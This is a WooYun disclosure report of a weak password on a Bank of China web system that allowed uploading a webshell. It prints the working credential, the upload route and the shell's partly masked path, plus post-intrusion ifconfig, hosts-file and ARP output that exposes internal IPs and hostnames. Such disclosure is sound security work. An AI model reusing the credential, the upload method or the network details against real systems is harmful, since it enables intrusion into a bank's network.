当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204059

漏洞标题:中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

相关厂商:中国银行

漏洞作者: 猪猪侠

提交时间:2016-05-01 14:44

修复时间:2016-06-18 21:00

公开时间:2016-06-18 21:00

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-01: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

详细说明:

#1 发现方法
利用通用的弱口令检测脚本,简单而又高效且杀伤力巨大
http://zone.wooyun.org/content/22529
http://zone.wooyun.org/content/21962
中国姓名排行TOP500(数据统计来自国家人口数据库)
http://zone.wooyun.org/content/18372
#2 漏洞描述
https://e.boc.cn/ehome/property/frame/sign.do
发现1个弱口令:wangwei:000000
社区管理功能,添加附件,即可获得shell

fujian.png


漏洞证明:

https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp

webshell.jpg


[/]$ /sbin/ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:50:56:9A:72:2C  
          inet addr:21.123.47.151  Bcast:21.123.47.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:127879201 errors:0 dropped:0 overruns:0 frame:0
          TX packets:117334178 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:22666975632 (21.1 GiB)  TX bytes:32615347620 (30.3 GiB)
eth1      Link encap:Ethernet  HWaddr 00:50:56:9A:14:C4  
          inet addr:10.123.47.151  Bcast:10.123.47.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:51273711 errors:0 dropped:0 overruns:0 frame:0
          TX packets:46856648 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:12233542012 (11.3 GiB)  TX bytes:9912431273 (9.2 GiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:238664440 errors:0 dropped:0 overruns:0 frame:0
          TX packets:238664440 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24040429146 (22.3 GiB)  TX bytes:24040429146 (22.3 GiB)
[/]$ cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
21.123.47.146	P1EZECAP01
21.123.47.147	P1EZECAP02
21.123.47.148	P1EZECAP03
21.123.47.149	P1EZECAP04
21.123.47.150	P1EZECAP05
21.123.47.151	P1EZECAP06
21.123.47.152	P1EZECAP07
21.123.47.153	P1EZECAP08
10.123.47.146	P1EZECAP01_gpfs
10.123.47.147	P1EZECAP02_gpfs
10.123.47.148	P1EZECAP03_gpfs
10.123.47.149	P1EZECAP04_gpfs
10.123.47.150	P1EZECAP05_gpfs
10.123.47.151	P1EZECAP06_gpfs
10.123.47.152	P1EZECAP07_gpfs
10.123.47.153	P1EZECAP08_gpfs
21.122.32.116 ZabbixServer
21.123.102.88 nbu3media1
21.123.102.89 nbu3media2
21.123.102.90 nbu3master
[/]$ /sbin/arp -a
? (21.123.47.161) at 00:50:56:9a:3d:95 [ether] on eth0
P1EZECAP05 (21.123.47.150) at 00:50:56:9a:00:55 [ether] on eth0
? (21.123.47.1) at 00:00:0c:9f:f0:2f [ether] on eth0
P1EZECAP01_gpfs (10.123.47.146) at 00:50:56:9a:62:66 [ether] on eth1
P1EZECAP05_gpfs (10.123.47.150) at 00:50:56:9a:79:c7 [ether] on eth1
P1EZECAP03_gpfs (10.123.47.148) at 00:50:56:9a:31:0c [ether] on eth1
P1EZECAP04_gpfs (10.123.47.149) at 00:50:56:9a:6f:8f [ether] on eth1
P1EZECAP07 (21.123.47.152) at 00:50:56:9a:49:62 [ether] on eth0
P1EZECAP08_gpfs (10.123.47.153) at 00:50:56:9a:7b:08 [ether] on eth1
P1EZECAP07_gpfs (10.123.47.152) at 00:50:56:9a:05:f1 [ether] on eth1
P1EZECAP02_gpfs (10.123.47.147) at 00:50:56:9a:56:89 [ether] on eth1
[/]$

修复方案:

补弱口令,补上传漏洞

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-04 20:50

厂商回复:

感谢白帽子

最新状态:

暂无